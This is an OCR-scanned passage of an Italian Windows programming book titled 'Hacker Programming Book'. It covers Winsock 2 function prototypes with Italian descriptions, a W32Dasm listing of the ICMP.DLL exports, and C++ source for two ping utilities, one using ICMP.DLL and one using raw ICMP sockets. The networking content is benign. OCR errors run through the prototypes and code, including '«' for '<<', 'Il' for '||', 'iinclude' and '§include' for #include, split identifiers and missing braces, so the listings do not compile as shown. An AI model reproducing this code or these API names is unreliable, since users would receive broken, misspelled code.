LPINT lpiProtocols , 

LPWSAPROTOCOL_INFO IpProtocolBuffer , 
ILPDWORD lpdwBufferLength 

); 



WSAEventSelect 



WSAEventSelect specifica l'oggetto eventi che deve essere associato con gli eventi 
FD_XXX. 

int WSAEventSelect ( 
SOCKET s, 

WSAEVENT hEventObject , 
long INet workEven t s 

); 



WSAGetLastError 



WSAGetLastError recupera lo stato degli errori a seguito del fallimento di una funzione. 
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int WSAGetLastError (vold) ; 



WSAGetOverlapped Resu It 



WSAGetOverlappedResult ritorna il risualtato per un operazione sovrapposta relativa al 
socket specificato. 

BOOL WSAGetOverlappedResult ( 
SOCKET s, 

LPWSAOVERLAPPED IpOverlapped , 
LP DWORD IpcbTransfer , 
BOOL fWait , 
LPDWORD lpdwFlags 

); 



WSAGetQOSByName 



WSAGetQOSByName inizializza una struttura QOS basata su di named template, oppure 
fornisce un buffer per recuperare un enumerazione per il template disponibile. 

BOOL WSAGetQOSByName ( 
SOCKET s, 

LPWSABUF lpQOSName , 
LPQOS lpQOS 

); 



WSAGetServiceClassInfo 



WSAGetServiceClassInfo recupera le informazioni legate alla classe (schema) relativa ad 
uno specoifico servizio nell'ambito di un name space provider. 



INT WSAGetServiceClassInfo ( 
LPGUID lpProviderld , 
LPGUID IpServiceClassId , 
LPDWORD lpdwBufferLength , 

LPWSASERVICECLASSINFO IpServiceClassInfo 

); 



WSAGetServiceClassNameByClassId 



WSAGetServiceClassNameByClassId restituisce il nome del servizio associato ad un 
determinato tipo. Questo nome è quello di un servizio generico tipo FTP o SNA. 

INT WSAGetServiceClassNameByClassId ( 
LPGUID IpServiceClassId , 
LPTSTR IpszServiceClassName , 
LPDWORD lpdwBufferLength 

); 



WSAHtonl 



WSAHtonl converte un ujong da host byte order a network byte order. 

int WSAHtonl ( 
SOCKET s, 
u_long host long , 
u_long FAR * lpnetlong 
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)} 



WSAHtons 



WSAHtons converte un u_short da host byte order a network byte order. 

int WSAHtons ( 
SOCKET s, 

u_ short hostshort , 
u_short FAR * lpnet short 

); 



WSAInstallServiceClass 



WSAInstallServiceClass registra un service class schema con un name space. Questo 
schema include il nome della classe, l'identificatore della classe, e qualsiasi informazione 
relativa a un name space che è comune a tutte le istanze, come l'identificatore SAP. 

INT WSAInstallServiceClass ( 

LPWSASERVICECLASSINFO IpServiceClassInfo 

); 



WSAIoctl 



WSAIoctl controlla il modo di un socket. 

int WSAIoctl ( 
SOCKET s, 

DWORD dwIoCon trolCode , 

LPVOID lpvInBuffer , 

DWORD cblnBuffer , 

LPVOID lpvOutBuffer , 

DWORD cbOutBuffer , 

LP DWORD IpcbBytesRet urned , 

LP WSAOVERLAPPED IpOverlapped , 

LPWSAOVERLAPPED_COMPLETION_ROUTINE IpCompletionRoutine 

)} 



WSAIsBlocking 



WSAIsBlocking non viene esportata direttamente da Ws2_32.dll, e l'applicazione 
Windows Sockets 2 non deve utilizzare questa funzione. Le applicazioni Windows 
Sockets 1.1 che chiamano questa funzione lo devono fare tramite Winsock.dll e 
Wsock32.dll. 



WSAJoinLeaf 



WSAJoinLeaf unisce un nodo in una sessione multipunto, scambia I dati connessi, e 
specifica la qualità del servizio. basato sulla struttura FLOWSPEC . 

SOCKET WSAJoinLeaf ( 
SOCKET s, 

const struct sockaddr FAR * name , 
int namelen, 
LPWSABUF IpCallerData , 
LPWSABUF IpCalleeData , 
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LPQOS IpSQOS , 
LPQOS lpGQOS , 
DWORD dwFlags 

); 



WSALookupServiceBegin 



WSALookupServiceBegin inizializza una query client che è costretta dalle informazioni 
contenute nella struttura WSAQUERYSET. WSALookupServiceBegin ritorna soltanto un 
handle, che deve essere usato da una successiva calla WSALookupServiceNext per 

ricevere il risultato attuale.. 

INT WSALookupServiceBegin ( 

LPWSAQUERYSET lpqsRestrictions , 
DWORD dwControlFlags , 
LPHANDLE lphLookup 

); 



WSALookupServiceEnd 



WSALookupServiceEnd è chiamata per liberare l'handle allocato dalla pecedente calla 
WSALookupServiceBegin e WSALookupServiceNext. 

INT WSALookupServiceEnd ( 
HANDLE hLookup 

); 



WSALookupServiceNext 



WSALookupServiceNext è chiamata dopo aver ottenuto un handle dalla precedente 
chiamata a WSALookupServiceBegin per recuperare le informazioni sul servizio. 

INT WSALookupServiceNext ( 
HANDLE hLookup , 
DWORD dwControlFlags , 
LPDWORD lpdwBufferLength , 
LPWSAQUERYSET lpqsResultS 

); 



WSANtohl 



WSANtohl converte un u_long da network byte order a host byte order. 

int WSANtohl ( 
SOCKET s, 
u_long net long , 
u_long FAR * lphostlong 

); 



WSANtohs 



WSANtohs converte un u_short da network byte order a host byte order. 

int WSANtohs ( 
SOCKET s, 
u_ short net short , 
u_short FAR * lphost short 
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)} 



WSAProviderConfigChange 



WSAProviderConfigChange notifica l'applicazione quando la configurazione è cambiata. 

int WSAAPI 

WSAProviderConfigChange ( 

LPHANDLE IpNotificationHandle , 
LPWSAOVERLAPPED IpOverlapped , 

LPWSAOVERLAPPED_COMPLETION_ROUTINE IpCompletionRoutine 

); 



WSARecv 



WSARecv riceve I dati da un socket connesso. 

int WSARecv ( 
SOCKET s, 

LPWSABUF lpBuffers , 

DWORD dwBufferCount , 

LP DWORD IpNumberOfByt esRecvd , 

LPDWORD lpFlags , 

LPWSAOVERLAPPED IpOverlapped , 

LPWSAOVERLAPPED_COMPLETION_ROUTINE IpCompletionRoutine 

); 



WSARecvDisconnect 



WSARecvDisconnect termina la ricezione su un socket. 

int WSARecvDisconnect ( 
SOCKET s, 

LPWSABUF lpInboundDisconnectData 

)} 



WSARecvEx 



WSARecvEx è identica recv , a parte il fatto che il parametro flags è un parametro [in, out]. 
Quando un messaggio parziale viene ricevuto usando un protocollo a datagramma, il bit 
MSG PARTIAL è settato. 



int PASCAL FAR WSARecvEx ( 
SOCKET s, 
char FAR * buf , 
int len , 
int * flags 

); 
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WSARecvFrom 



WSARecvFrom riceve un datagramma e lo salva ad un indirizzo di sorgente. 

int WSARecvFrom ( 
SOCKET s, 

LPWSABUF lpBuffers , 

DWORD dwBufferCount , 

LPDWORD IpNumberOfBytesRecvd , 

LPDWORD lpFlags , 

struct sockaddr FAR * lpFrom , 

LPINT lpFromlen , 

LPWSAOVERLAPPED IpOverlapped , 

LPWSAOVERLAPPED_COMPLETION_ROUTINE IpCompletionRoutine 

); 



WSARemoveServiceClass 



WSARemoveServiceClass rimuove dal registro lo schema.. 

INT WSARemoveServiceClass ( 
LPGUID IpServiceClassId 

)} 



WSAResetEvent 



WSAResetEvent resetta l'oggetto evento. 

BOOL WSAResetEvent ( 
WSAEVENT hEvent 

); 



WSASend 



WSASend invia dati sul socket. 

int WSASend ( 
SOCKET s, 

LPWSABUF lpBuffers , 
DWORD dwBufferCount , 
LPDWORD IpNumberOfBytesSent , 
DWORD dwFlags , 

LPWSAOVERLAPPED IpOverlapped , 

LPWSAOVERLAPPED_COMPLETION_ROUTINE IpCompletionRoutine 

); 



WSASendDisconnect 



WSASendDisconnect inizializza la terminazione della connessione e invia I dati della 
sconnessione. 

int WSASendDisconnect ( 
SOCKET s, 

LPWSABUF lpOutboundDisconnectData 
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)} 



WSASendTo 



WSASendTo invia dei dati a una destinazione specifica, usando I/O overlapped dove 
possibile. 

int WSASendTo ( 
SOCKET s, 

LPWSABUF lpBuffers , 

DWORD dwBufferCount , 

LP DWORD IpNumberOfBytesSent , 

DWORD dwFlags, 

const struct sockaddr FAR * lpTo , 
int iToLen , 

LP WSAOVERLAPPED IpOverlapped , 

LPWSAOVERLAPPED_COMPLETION_ROUTINE IpCompletionRoutine 

); 



WSASetBlockingHook 



Questa funzione è stata rimossa in accordo con le specifiche Windows Sockets 2 
specification, revision 2.2.0. 



WSASetEvent 



WSASetEvent setta lo stato dell'oggetto eventi specificato.. 

BOOL WSASetEvent ( 
WSAEVENT hEvent 

)} 



WSASetLastError 



WSASetLastError setta il codice d'errore che può essere recuperato da WSAGetLastError . 

void WSASetLastError ( 
int iError 

); 



WSASetService 



WSASetService registra o rimuove dal registro l'istanza del servizio relativo a uno o più 
name spaces. 

INT WSASetService ( 

LPWSAQUERYSET lpqsReglnfo , 
WSAESETSERVICEOP essOperation , 
DWORD dwControlFlags 

); 



WSASocket 



WSASocket crea un soacket . 
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SOCKET WSASocket ( 
int af , 
int type , 
int protocol , 

LPWSAPROTOCOL_INFO IpProt ocol Info , 
GROUP g, 
DWORD dwFlags 

); 



WSAStartup 



WSAStartup inizializza l'uso del processo di Ws2_32.dll. 

int WSAStartup ( 

WORD wVersionRequested , 
LPWSADATA lpWSAData 

); 



WSAStringToAddress 



WSAStringToAddress converte una stringa numerica in una struttura SOCKADDR . 

INT WSAStringToAddress ( 
LPTSTR AddressString , 
INT Addres sFami ly , 

LPWSAPROTOCOL_INFO IpProt ocol Info , 
LP SOCKADDR lpAddress , 
LPINT lpAddressLength 

); 



WSAWaitForMultipleEvents 



WSAWaitForMultipleEvents ritorna quandeo uno o tutti gli oggetti evento specificati sono in 
un certo stato. 



DWORD WSAWaitForMultipleEvents ( 
DWORD cEvents , 

const WSAEVENT FAR * lphEvents , 
BOOL fWaitAll , 
DWORD dwTimeout , 
BOOL fAlertable 

>; 



Uso dei Sockets 

I Sockets sono utilizzatissimi in almeno tre settori delle comunicazioni: 

• Modelli Client/Server 

• Scenari Peer-to-peer scenarios, come applicazioni chat 

• Esecuzione di procedure remote (RPC) 

L'immagine che segue visualizza la struttura funzionale di WINSOCK. 
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Windows 
Sockets 2 
Application 



Windows 
Sockets 2 
Application 



Windows 
Soc^|ts 2 API 



Transport 
Functions 



Name Space 
Functions 



WS2 32.DLL 



Windows Sockets 2 
Transport SPI 



Windows Sockets 2 
Name Space SPI 



Transport 
Service 
Provider 



Transport 
Service 
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Name Space 
Service 
Provider 



Name Space 
Service 
Provider 



I socket vengono utilizzati per gestire due tipi fondamentali di comunicazioni le quali vengono 

settate tramite appositi flags specificati dentro a certe funzioni. 

Questi tipi di comunicazioni sono quelle bloccanti e quelle non bloccanti. 

All'interno delle funzioni della libreria vengono usati diversi tipi di dati relativi ad informazioni 

semplici e a certe di tipologia strutturata. 

L'uso dei socket dentro ai nostri programmi è molto semplice in quanto generalmente 
utilizziamo alcune funzioni legate a gestire la tipologia di ambiente del socket stesso e poi 
successivamente delle funzioni adatte ad aprire il socket il cui identificatore o handle verrà 
utilizzato dalle funzioni di scrittura e lettura. 

Un programma potrebbe aprire anche diversi sockets ciascuno dei quali potrebbe disporre di 
un corrispondente sul sistema remoto. 

Questi socket aperti corrispondono a canali di comunicazione tra due punti diversi 
geograficamente remoti. 

Come dicevo prima in alcuni ambienti come ad esempio CPPBuilder la gestione visuale dei 
sockets semplifica concettualmente il loro uso. 

In questo ambiente aprire un canale di comunicazione equivale soltanto a prendere dalla 
toolbar degli oggetti l'icona che lo rappresenta e inserirlo all'interno del form. 
Mediante la specifica dei dati dentro alla dialog chiamata Object Inspecotor è possibile 
specificare gli attributi del socket stesso come ad esempio il nome, i parametri come l?IP e la 
porta, sia locale che remota, ed altre informazioni necessarie al corretto funzionamento. 
Ho voluto riportare anche una parte in Java relativa a questo trattamento in quanto questa 
risulta spesso utile visto che Java potrebbe essere presente senza avere la necessità di 
compilare un programma su qualsiasi macchina remota. 



Esempi di Utilities scritte con W I N SOCK 

Il primo esempio è una semplicissima funzione di PING la quale sfrutta la libreria dinamica 
ICMP.DLL. 

Questa libreria viene fornita con WINDOWS e si trova nella directory \winnt\system32. 
Andando a vedere una delle Utilities viste con gli strumenti da cracker, possiamo con questa 
identificare quali sono le funzioni che sono interne alla DLL stessa. 

Questa visualizzazione possiamo eseguirla sia con un debugger come WDASM che con unh 
normalissimo PEExplorer come PEBrowser Professional. 

Usando WDASM32 possiamo vedere la dichiarazione delle funzioni nella testata del sorgente 
in assembler. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



SS URSoft W32Dasm Ver 8.9 Program Disassembler/Debugger 



Project Deq^p Search Goto Execute Text Functions 



HexData Refs 



Disassembler 
Help 



Number of Export ed Functions = 0008 (decimai) 



Addr 


742410B1 


Ord: 


1 


(000 Ih) 


ITame : 


IcmpCloseHandle 


Addr 


742410D9 


Ord: 


2 


(0002h) 


ITame : 


IcmpCreateFile 


Addr 


74241102 


Ord: 


3 


(0003h) 


liane : 


IcmpParseReplies 


Addr 


7424112A 


Ord: 


4 


(0004h) 


Nane : 


IciapSendEchoZ 


Addr 


7424114E 


Ord: 


E 


(OOOSh) 


ITame : 


IcmpSendEcho 


Addr 


74241170 


Ord: 


6 


(0006h) 


ITame : 


do echo rep 


Addr 


74241191 


Ord: 


7 


(0007h) 


ITame : 


do echo req 


Addr 


742411B4 


Ord: 


8 


(0008h) 


ITame : 


resister icmp 



J 



+++++++++++++++++++ ASSEHELT CODE LISTINO ++++++++++++++++++ 

^■^■■dt-********-*-********-*-*** Start of Code in Qbject *■*■■*■■*■*■*■■*■*■*■■*■■*■* ** 

» Progr am Ent ry P o int Hot Àvai 1 ab 1 e 

IjlJJ 



7 * 



L 



Line: 41 Pg 1 of 3 File:icnnp.i 



Queste funzioni sono di fatto quelle che vengono usate nel sorgente che segue per eseguire 
le funzioni di PING. 



dlloing.cpp 

// Borland C++ 5.0: bcc32.cpp ping.cpp 

// Visual C++ 5.0: ci ping.cpp wsock32 . lib 



iinclude <iostream.h> 
§include <winsock.h> 
iinclude <windowsx.h> 
^include "icmpdefs . h" 



int doit (int argc, char* argv[]) 
{ 

// Check for correct command—line args 
if (argc < 2) { 

cerr « "usage: ping <host>" « endl; 

return 1; 

} 

// Load the ICMP. DLL 

HINSTANCE hlcmp = LoadLibraryCICMP.DLL"); 
if (hlcmp == 0) { 

cerr « "Unable to locate ICMP. DLL!" « endl; 

return 2; 

ì 

// Look up an IP address for the given host name 
struct hostent* phe; 

if ((phe = gethostbyname(argv[l] ) ) == 0) { 

cerr « "Could not find IP address for " « argv[l] « endl; 
return 3; 

} 



// Get handles to the functions inside ICMP. DLL that we'll need 
typedef HANDLE (WINAPI* pfnHV) (VOID) ; 
typedef BOOL (WINAPI* pfnBH) (HANDLE) ; 

typedef DWORD (WINAPI* pfnDHDPWPipPDD) (HANDLE, DWORD, LPVOID, WORD, 
PIP_OPTION__INFORMATION, LPVOID, DWORD, DWORD); // evil, no? 
pfnHV pIcmpCreateFile; 
pfnBH pIcmpCloseHandle ; 
pfnDHDPWPipPDD pIcmpSendEcho; 

pIcmpCreateFile = (pfnHV) GetProcAddress (hlcmp, 

"IcmpCreateFile ") ; 
pIcmpCloseHandle = (pfnBH) GetProcAddress (hlcmp, 
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" IcmpCloseHandle ") ; 
pIcmpSendEcho = (pfnDHDPWPipPDD) GetProcAddress (hlcmp, 

" IcmpSendEcho ") ; 
if ( (pIcmpCreateFile == 0) Il (pIcmpCloseHandle == 0) Il 
(pIcmpSendEcho == 0) ) { 
cerr « "Failed to get proc addr for function . " « endl; 
return 4; 

ì 

// Open the ping service 
HANDLE hIP = pIcmpCreateFile () ; 
if (hIP == INVALID_HANDLE_VALUE) { 

cerr « "Unable to open ping service . " « endl; 

return 5; 

} 

// Build ping packet 
char acPingBuffer[64] ; 

memset (acPingBuffer, ' \xAA ' , sizeof (acPingBuffer) ) ; 
PIP_ECHO_REPLY pipe = (PIP_ECHO_REPLY) GlobalAlloc ( 
GMEM_FIXED / GMEM_ZEROINIT, 

sizeof (IP_ECHO_REPLY) + sizeof (acPingBuffer) ) ; 
if (pipe == 0) { 

cerr « "Failed to allocate global ping packet buffer. " « endl; 
return 6; 

} 

pIpe->Data = acPingBuffer; 
pIpe->DataSize = sizeof (acPingBuffer) ; 

// Send the ping packet 

DWORD dwStatus = pIcmpSendEcho (hIP , *( (DWORD*) phe->h_addr_list [0] ) , 
acPingBuffer, sizeof (acPingBuffer) , NULL, pipe, 
sizeof (IP_ECHO_REPLY) + sizeof (acPingBuffer) , 5000); 
if (dwStatus .'= 0) { 

cout « "Addr: " « 

int (LOBYTE (LOWORD (pIpe->Address) ) ) « "." « 
int (HIBYTE (LOWORD (pIpe->Address) ) ) « "." « 
int (LOBYTE (HIWORD (pIpe->Address) ) ) « "." « 
int (HIBYTE (HIWORD (pIpe->Address) ) ) « ", " « 
"RTT: " « int (pIpe->RoundTripTime) « "ms, " « 
"TTL: " « int (pIpe->Options . Ttl) « endl; 

} 

else { 

cerr « "Error obtaining info from ping packet . " « endl; 

) 



// Shut down . . . 
GlobalFree (pipe) ; 
FreeLibrary (hlcmp) ; 
return 0; 



int main(int argc, char* argv[]) 
{ 

WSAData wsaData; 

if (WSAStartup (MAKEWORD (1 , 1) , SwsaData) .'= 0) { 
return 255; 

) 



int retval = doit (argc, argv) ; 



WSACleanup () ; 
return retval; 

) 



icmpdefs.h 

// Structures required to use functions in ICMP.DLL 



typedef struct { 

unsigned char Ttl; // Time To Live 

unsigned char Tos; // Type Of Service 

unsigned char Flags; // IP header flags 

unsigned char OptionsSize; // Size in bytes of options data 

unsigned char *OptionsData; // Pointer to options data 

} IP__OPTION_INFORMATION, * PIP__OPTION__INFORMATION; 
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typedef struct { 
DWORD Address; 
unsigned long Status; 
unsigned long RoundTripTime; 
unsigned short DataSize; 
unsigned short Reserved; 
void *Data; 

IP_OPTION_INFORMATION Options; 
} IP_ECHO_REPLY, * PIP_ECHO_REPLY; 



// Replying address 

// Reply status 

// RTT in milliseconds 

// Echo data size 

// Reserved for system use 

// Pointer to the echo data 

// Reply options 



Il secondo esempio esegue il ping in modalità RAW utilizzando WINSOCK 2 
rawping driver.cpp 

/*********************************************************************** 

rawpingdriver . cpp — A driver program to test the rawping. cpp module. 
Building under Microsoft C++ 5.0: 

ci -GX rawping. cpp rawping_driver . cpp ip_checksum . cpp ws2_32.1ib 
Building under Borland C++ 5.0: 

bcc32 rawping. cpp rawping^driver . cpp ip^checksum . cpp ws2 32.1ib 



Change log: 

9/21/1998 - Added TTL support . 

2/14/1998 — Polished the program up and separated out the 

rawping. cpp and ip checksum . cpp modules. Also got it to work 
under Borland C++. 

2/12/1998 - Fixed a problem with the checksum calculation. Program 
works now. 

2/6/1998 - Created using Microsoft 's "raw ping" sample in the Win32 
SDK as a model . Not much remains of the originai code . 
********************************************* 

^include <winsock2.h> 
^include <iostream.h> 

^include "rawping. h" 

idefine DEFAULT_PACKET_SIZE 32 

idefine DEFAULT_ TTL 30 

#define MAX_PING_DATA_SIZE 1024 

idefine MAX_PING_PACKET_SIZE (MAX_PING_DATA_SIZE + sizeof (IPHeader) ) 

int allocate_buffers(ICMPHeader*& send_buf, IPHeader*S recv__buf, 
int packet_size) ; 



/////////////////////////////////////////////////////////////////////// 
// Program entry point 

int mainfint argc, char* argv[]) 
{ 

// Init some variables at top, so they aren 't skipped by the 
// cleanup routines. 
int seq_no = 0; 
ICMPHeader* send_buf = 0; 
IPHeader* recv_buf = 0; 

// Did user pass enough parameters? 
if (argc < 2) { 

cerr « "usage: " « argv[0] « " <host> [data_size] [ttl] " « 
endl; 

cerr « " data_size can be up to " « MAX_PING_DATA_SIZE « 

" bytes. De fault is " « DEFAULT_PACKET_SIZE « ". " « 
endl; 

cerr « " ttl should be 255 or lower. Default is " « 

DEFAULT_ TTL « ". " « endl; 
return 1; 
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; 

// Figure out how big to make the ping packet 
int packet_size = DEFAULT_PACKET_SIZE; 
int ttl = DEFAULT_ TTL; 
if (argc > 2) { 

int temp = atoi (argv[2] ) ; 

if (temp ì= 0) { 

packet_size = temp; 

} 

if (argc > 3) { 

temp = atoi (argv[3] ) ; 
if ( (temp >= 0) && (temp <= 255) ) { 
ttl = temp; 

} 

} 

} 

packet_size = max (sizeof (ICMPHeader) , 

min (MAX_PING_DATA_SIZE, (unsigned int) packet_size) ) ; 

// Start Winsock up 
WSAData wsaData; 

if (WSAStartup (MAKEWORD (2, 1) , SwsaData) .'= 0) { 

cerr « "Failed to find Winsock 2.1 or better. " « endl; 
return 1; 

} 

// Set up for pinging 
SOCKET sd; 

sockaddr_in dest, source; 

if (setup_for_ping(argv[l] , ttl, sd, dest) < 0) { 
goto cleanup; 

} 

if (allocate_buffers(send_buf, recv_buf, packet_size) < 0) { 
goto cleanup; 

} 

init__ping_packet (send buf, packet_size, seq_no) ; 
// Send the ping and receive the reply 

if (send ping (sd, dest, sendbuf, packet_size) >= 0) { 
while (1) { 

// Receive replies until tre either get a success fui read, 
// or a fatai error occurs . 

if ( recv_ping ( sd, source, recv_buf, MAX_PING_PACKET_SIZE) < 
0) { 

// Pulì the sequence number out of the ICMP header. If 
// it 's bad, we just complain, but otherwise we take 
// off, because the read failed for some reason. 
unsigned short header len = recvbuf->hlen * 4; 
ICMPHeader* icmphdr = (ICMPHeader*) 

( (char* ) recv_buf + header_len) ; 
if (icmphdr->seq != seq_no) { 

cerr « "bad sequence number!" « endl; 

continue; 

} 

else { 

break; 

} 

} 

if (decode_reply(recv_buf, packet_size, Ssource) != -2) { 
// Success or fatai error (as opposed to a minor error) 
// so take off. 
break; 

) 

} 

} 

cleanup: 

delete [ ] send_buf ; 
delete [] recv_buf; 
WSACleanup () ; 
return 0; 



/////////////////////////// allocate^buffers /////////////////////////// 
// Allocates send and receive buffers. Returns < 0 for f allure. 
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int allocate_buffers(ICMPHeader*& send_buf, IPHeader*& recv_buf, 
int packet_size) 

{ 

// First the send buffer 

send__buf = (ICMPHeader*) new char [packetsize] ; 
if (send_buf == 0) { 

cerr « "Failed to allocate output buffer. " « endl; 

return —1; 

ì 

// And then the receive buffer 

recv___buf = ( IPHeader* ) new char [MAX_PING_PACKET_SIZE] ; 
if (recv_buf == 0) { 

cerr « "Failed to allocate output buffer. " « endl; 

ret urn —1; 

} 

return 0; 

ì 

rawping.cpp 

/****************************************************** 

rawping.cpp — Contains ali of the functions essential to sending "ping" 
packets using Winsock 2 raw sockets. Depends on ipchecksum. cpp for 
calculating IP—style checksums on blocks of data, however. 

iinclude <winsock2.h> 
^include <ws2tcpip.h> 
^include <iostream.h> 

iinclude "rawping.h" 
^include "ip_checksum. h" 



//////////////////////////// setup_for_ping //////////////////////////// 
// Creates the Winsock structures necessary for sending and recieving 
// ping packets. host can be either a dotted-quad IP address, or a 
// host name. ttl is the time to live (a.k.a. number of hops) far the 
// packet . The other two parameters are outputs from the function. 
// Returns < 0 for f allure. 

int setup_for_ping(char* host, int ttl, SOCKETS sd, sockaddr_inS dest) 
{ 

// Create the socket 

sd = WSASocket <AF_INET, SOCK_RAW, IPPROTO_ICMP, 0, 0, 0) ; 
if (sd == INVALID_SOCKET) { 

cerr « "Failed to create raw socket: " « WSAGetLastError () « 
endl; 

return -1; 

ì 

if (setsockopt (sd, IPPROTO^IP, IP_TTL, (const char*) Sttl, 
sizeof(ttl)) == SOCKET ERROR) { 
cerr « "TTL setsockopt failed: " « WSAGetLastError ( ) « endl; 
return -1; 

} 

// Initialize the destination host info block 
memset (sdest, 0, sizeof (dest) ) ; 

// Turn first passed parameter into an IP address to ping 
unsigned int addr = inet_addr (host) ; 
if (addr != INADDR^NONE) { 

// It was a dotted quad number, so save result 

dest . sin__addr . s_addr = addr; 

dest . sin_family = AF_INET; 

) 

else { 

// Hot in dotted quad foriti, so try and look it up 

hostent* hp = gethostbyname (host) ; 

if (hp != 0) { 

// Found an address for that host, so save it 
memcpy (S (dest . sin_addr) , hp->h__addr, hp->h length) ; 
dest . sin__family = hp->h__addrtype; 

} 
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else { 

// Not a recognized hostname either! 

cerr « "Failed to resolve " « host « endl; 

return -1; 

} 

} 

return 0; 

} 



/////////////////////////// ±n±t_ping_packet /////////////////////////// 

// Fili in the fields and data area of an ICMP packet, making it 

// packet_size bytes by padding it with a byte pattern, and giving it 

// the given sequence number . That completes the packet, so we also 

// calcolate the checksum for the packet and place it in the appropriate 

// field. 

void init_ping_packet (ICMPHeader* icmp_hdr, int packet_size, int seq_no) 
{ 

// Set up the packet 's fields 
icmp_hdr->type = ICMP_ECHO_REQUEST '; 
icmp_hdr->code = 0; 
icmp_hdr->checksum = 0; 

icmp_hdr->id = (USHORT) GetCurrentProcessId<) ; 
icmp__hdr->seq = seq_no; 
icmp_hdr—>timestamp = GetTickCount () ; 

// "You're dead meat now, packet!" 

const unsigned long int deadmeat = OxDEADBEEF ; 

char* datapart = (char*) icmp^hdr + sizeof (ICMPHeader) ; 

int bytes left = packet__size - sizeof (ICMPHeader) ; 

while (bytes_left > 0) { 

memcpy (datapart, sdeadmeat, min (int (sizeof (deadmeat) ) , 
bytes_left) ) ; 

bytes_left -= sizeof (deadmeat) ; 

datapart += sizeof (deadmeat) ; 

} 

// Calculate a checksum on the result 

icmp_hdr—>checksum = ip^checksum ( (USHORT* ) icmp__hdr , packet size) ; 

} 



/////////////////////////////// send_ping ////////////////////////////// 

// Send an ICMP echo ("ping") packet to host dest by way of sd with 

// packet_size bytes. packet_size is the total size of the ping packet 

// to send, including the ICMP header and the payload area; it is not 

// checked for sanity, so make sure that it ' s at least 

// sizeof (ICMPHeader) bytes, and that send_buf points to at least 

// packet size bytes. Returns < 0 for f allure. 

int send_ping (SOCKET sd, const sockaddr_inS dest, ICMPHeader* send_buf, 
int packet_size) 

{ 

// Send the ping packet in send_buf as—is 

cout « "Sending " « packet_size « " bytes to " « 

inet^ntoa (dest . sin_addr) « « flush; 

int bwrote = sendto (sd, (char*) send_buf, packet_size, 0, 

(sockaddr*) sdest, sizeof (dest) ) ; 
if (bwrote == SOCKET_ERROR) { 

cerr « "send failed: " « WSAGetLastError ( ) « endl; 
ret urn -1; 

) 

else if (bwrote < packet_size) { 

cout « "sent " « bwrote « " bytes. . . " « flush; 

) 

return 0; 

} 



/////////////////////////////// recv_ping ////////////////////////////// 
// Receive a ping reply on sd into recv_buf, and stores address info 
// for sender in source. On f allure, returns < 0, 0 otherwise. 

// 
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// Note that recv_buf must be larger than send_buf (passed to send ping) 

// because the incoming packet has the IP header attached. It can also 

// have IP options set, so it is not sufficient to make it 

// sizeof (send_buf) + sizeof (IPHeader) . We suggest just making it 

// fairly large and not worrying about wasting space. 

int recv _ping ( SOCKET sd, sockaddr__in& source, IPHeader* recvbuf, 
int packet_size) 

{ 

// Wait for the ping reply 
int fromlen = sizeof (source) ; 
int bread = recvfrom(sd, (char*) recv_buf, 
packet^size + sizeof (IPHeader) , 0, 
(sockaddr*) Ssource, S fromlen) ; 
if (bread == SOCKET^ERROR) { 
cerr « "read failed: "; 

if (WSAGetLastError() == WSAEMSGSIZE) { 
cerr « "buffer too small " « endl; 

} 

else { 

cerr « "error §" « WSAGetLastError ( ) « endl; 

} 

ret urn —1; 

) 

return 0; 

} 



///////////////////////////// decode_reply ///////////////////////////// 
// Decode and output details about an ICMP reply packet. Returns -1 
// on f allure, —2 on "try again" and 0 on success. 

int decode_reply (IPHeader* reply, int bytes, sockaddr_in* from) 
{ 

// Skip ahead to the ICMP header within the IP packet 
unsigned short header_len = reply->h_len * 4; 

ICMPHeader* icmphdr = ( ICMPHeader* ) ( (char*) reply + header_len) ; 

// Make sure the reply is sane 

if (bytes < header_len + ICMP_MIN) { 

cerr « "too few bytes from " « inet_ntoa(from->sin__addr) « 
endl; 

return —1; 

) 

else if (icmphdr->type != ICMP_ECHO_REPLY) { 
if (icmphdr->type != ICMP_TTL_EXPIRE) { 

if (icmphdr->type == ICMP__DEST_UNREACH) { 

cerr « "Destination unreachable" « endl; 

} 

else { 

cerr « "Unknown ICMP packet type " « int (icmphdr->type) 
" received" « endl; 

) 

ret urn —1; 

) 

// If "TTL expired", fall through. Next test will fall if we 
// try it, so we need a way past it . 

} 

else if (icmphdr->id '.= (USHORT) GetCurrentProcessId() ) { 

// Must be a reply for another pinger running locally, so just 
// ignore it . 
return -2; 

) 

// Figure out how far the packet travelled 
int nHops = int (256 - reply->ttl) ; 
if (nHops ==192) { 

// TTL carne back 64, so ping was probably to a host on the 

// LAN — cali it a single hop. 

nHops = 1; 

} 

else if (nHops == 128) { 
// Probably localhost 
nHops = 0; 

} 
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// Okay, tre ran the gamut, so the packet must he legai — dump it 
cout « endl « bytes « " bytes from " « 

lnet_ntoa (from—>sln_addr) « ", icmp_seq " « 

lcmphdr->seq « ", "; 
if (icmphdr->type == ICMP_TTL_EXPIRE) { 
cout « "TTL expired. " « endl; 

} 

else { 

cout « nHops « " hop " « (nHops == 1 ? "" : "s ") ; 
cout « time: " « (GetTickCount () - icmphdr->timestamp) « 
" ms. " « endl; 

} 

return 0; 

ì 

Un altro modulo utilizzato : 
io checksum.coD 

/******************************************** 

ip_checksum. cpp — Calculates IP—style checksums on a block of data. 
****************************************************************** 

idefine WIN32_LEAN_AND_MEAN 
^include <windows.h> 

USHORT ip_checksum(USHORT* buffer, Int size) 
{ 

unsigned long cksum = 0; 

// Sum ali the words together, adding the final byte if size is odd 
while (size > 1) { 

cksum += *buffer++; 

size -= sizeof (USHORT) ; 

} 

if (size) { 

cksum += * (UCHAR* ) buffer ; 

} 

// Do a little shuffling 

cksum = (cksum » 16) + (cksum S Oxffff); 
cksum += (cksum » 16); 

// Return the bitwise complement of the resulting mishmash 
return (USHORT) (~cksum) ; 

} 

rawpinq.h 

/*********************************************************************** 

rawping.h — Declares the types, constants and prototypes required to 
use the rawping.cpp module. 
***********************************************************************/ 



idefine WIN32_LEAN_AND_MEAN 
^include <winsock2.h> 

// ICMP packet types 
idefine ICMP_ECHO_REPLY 0 
idefine ICMP_DEST_ UNREACH 3 
idefine ICMP_TTL_EXPIRE 11 
idefine ICMP_ECHO__REQUEST 8 



// Minimum ICMP packet size, in bytes 
idefine ICMP_MIN 8 



iifdef _MSC_VER 

// The following two structures need to be packed tightly, but unlike 
// Borland C++, Microsoft C++ does not do this by default, 
ipragma pack(l) 
iendif 



// The IP header 
struct IPHeader { 



BYTE h_len:4; 


// 


BYTE versi on : 4 ; 


// 


BYTE tos; 


// 


USHORT total_len; 


